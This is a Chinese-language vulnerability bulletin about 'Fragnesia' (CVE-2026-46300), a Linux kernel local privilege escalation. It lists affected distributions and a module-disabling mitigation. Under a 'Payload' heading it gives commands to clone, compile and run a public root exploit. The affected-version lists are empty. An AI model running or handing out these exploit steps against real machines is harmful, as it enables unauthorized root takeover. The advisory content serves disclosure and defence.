继前两周曝出的“Dirty Frag”和“Copy Fail”漏洞之后,又发现了一个全新的本地提权(LPE)漏洞:Fragnesia (CVE-2026-46300)。
这已经是近三周内公开的第三个与该攻击面相关的高危漏洞。攻击者仅需在终端执行一条命令,即可在没有权限的情况下获得Root控制权,且整个过程极其稳定,不依赖传统的竞争条件。
漏洞编号:CVE-2026-46300
漏洞别名:Fragnesia
危害等级:高危 (CVSS 7.8)
利用条件:本地低权限用户
Payload:
git clone https://github.com/v12-security/pocs.gitcd pocs/fragnesiagcc -o exp fragnesia.c./exp
演示
以Ubuntu24.04版本为例,演示如下,成功拿到root权限。
- 受影响对象:
- Ubuntu
- Red Hat Enterprise Linux
- SUSE Linux Enterprise Server
- Debian / AlmaLinux / openSUSE 等
- 受影响内核版本:
- 2026 年 5 月 13 日之前发布的 Linux Kernel 均可能受影响
· 已确认受影响版本(部分发行版)
Debian 官方安全跟踪中列出的受影响版本包括:
Ubuntu 官方状态页显示以下版本正在评估/受影响:
临时缓解方案
卸载并禁用以下模块:
printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' \> /etc/modprobe.d/dirtyfrag.conf